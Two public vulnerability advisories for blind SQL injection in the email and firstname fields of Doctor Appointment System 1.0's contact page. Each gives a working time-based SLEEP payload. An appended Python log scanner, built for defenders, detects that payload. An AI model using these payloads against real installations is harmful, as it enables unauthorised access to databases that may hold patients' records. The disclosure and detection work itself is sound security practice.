# Exploit Title: Doctor Appointment System 1.0 Blind SQL injection in email parameter
# Date: 03-03-2021
# CVE: CVE-2021-27319
# Exploit Author: Nakul Ratti
# Vendor Homepage: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Software Link: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Version: V1.0

Vulnerable File:
----------------
http://host/doctorappointment/contactus.php

Vulnerable Issue:
-----------------
The email parameter has no input validation.

POC:
----
1] Navigate to http://host/doctorappointment/contactus.php
2] In the email parameter, enter the following payload to exploit blind SQL injection: '+AND+(SELECT+7827+FROM+(SELECT(SLEEP(10)))xEII)+AND+'1'%3d'1
3] This can be escalated further to dump sensitive information from the database.

------------------

# Exploit Title: Doctor Appointment System 1.0 Blind SQL injection in firstname parameter
# Date: 03-03-2021
# CVE: CVE-2021-27320
# Exploit Author: Nakul Ratti
# Vendor Homepage: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Software Link: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Version: V1.0

Vulnerable File:
----------------
http://host/doctorappointment/contactus.php

Vulnerable Issue:
-----------------
The firstname parameter has no input validation.

POC:
----
1] Navigate to http://host/doctorappointment/contactus.php
2] In the firstname parameter, enter the following payload to exploit blind SQL injection: '+AND+(SELECT+7827+FROM+(SELECT(SLEEP(10)))xEII)+AND+'1'%3d'1
3] This can be escalated further to dump sensitive information from the database.

------------------
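
Added example (not part of the original advisories): a Python check a defender could run over request logs to flag the time-based payloads both POCs describe in the email and firstname fields of contactus.php. The record format (path, URL-encoded form body, response time in seconds), the 5-second threshold and the sample records are constructed assumptions.

```python
import re
from urllib.parse import parse_qs

# Fields the two advisories name as injectable on contactus.php.
WATCHED_FIELDS = ("email", "firstname")
# Time-delay calls used by time-based blind SQL injection against MySQL.
DELAY_CALL = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)
# A quote followed by AND/OR: the string literal is being closed early.
QUOTE_BREAKOUT = re.compile(r"'\s*(and|or)\b", re.IGNORECASE)

PAYLOAD = "'+AND+(SELECT+7827+FROM+(SELECT(SLEEP(10)))xEII)+AND+'1'%3d'1"  # from the POC
PAGE = "/doctorappointment/contactus.php"
# Constructed sample records (assumed format): (path, raw form body, seconds).
SAMPLE_LOG = [
    (PAGE, "firstname=Ann&email=ann%40example.org", 0.08),
    (PAGE, "firstname=Ann&email=" + PAYLOAD, 10.21),            # delay executed
    (PAGE, "firstname=" + PAYLOAD + "&email=bob%40example.org", 0.06),  # no delay
    (PAGE, "firstname=O'Reilly&email=tim%40example.org", 6.30),  # slow but benign
]

def scan(records, slow_seconds=5.0):
    """Return (record index, field, reasons) for suspicious submissions."""
    findings = []
    for i, (path, body, seconds) in enumerate(records):
        if not path.endswith("/contactus.php"):
            continue
        # parse_qs URL-decodes values, so '+' and %3d are normalised first.
        form = parse_qs(body, keep_blank_values=True)
        for field in WATCHED_FIELDS:
            for value in form.get(field, []):
                reasons = []
                if DELAY_CALL.search(value):
                    reasons.append("delay-call")
                if QUOTE_BREAKOUT.search(value):
                    reasons.append("quote-breakout")
                # A slow response next to a payload suggests the delay ran,
                # i.e. the input reached the database unparameterised.
                if reasons and seconds >= slow_seconds:
                    reasons.append("slow-response")
                if reasons:
                    findings.append((i, field, reasons))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding that includes slow-response is the one to prioritise, since it indicates the injected delay actually executed on the database.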